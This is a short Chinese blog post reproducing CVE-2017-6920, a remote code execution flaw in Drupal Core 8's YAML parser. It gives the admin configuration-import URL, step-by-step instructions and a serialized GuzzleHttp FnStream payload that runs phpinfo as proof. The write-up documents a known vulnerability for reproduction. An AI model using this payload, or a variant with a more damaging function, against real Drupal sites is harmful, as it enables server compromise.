溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Drupal Core 8 PECL YAML 反序列化任意

發(fā)布時間:2020-07-13 00:28:14 來源:網(wǎng)絡(luò) 閱讀:333 作者:小武w 欄目:安全技術(shù)

漏洞背景:
2017年6月21日,Drupal官方發(fā)布了一個編號為CVE-2017- 6920 的漏洞,影響為Critical。這是Drupal Core的YAML解析器處理不當所導致的一個遠程代碼執(zhí)行漏洞,影響8.x的Drupal Core。

漏洞復現(xiàn):
1.打開網(wǎng)頁先登錄一個管理員賬號。
2.訪問 http://你的ip:8080/admin/config/development/configuration/single/import
3.然后如下圖所示:第二個隨便填。Drupal Core 8 PECL YAML 反序列化任意
poc:!php/object "O:24:\"GuzzleHttp\Psr7\FnStream\":2:{s:33:\"\0GuzzleHttp\Psr7\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

 4.然后執(zhí)行最下面的import,會再出來個phpinto就代表成了。
向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI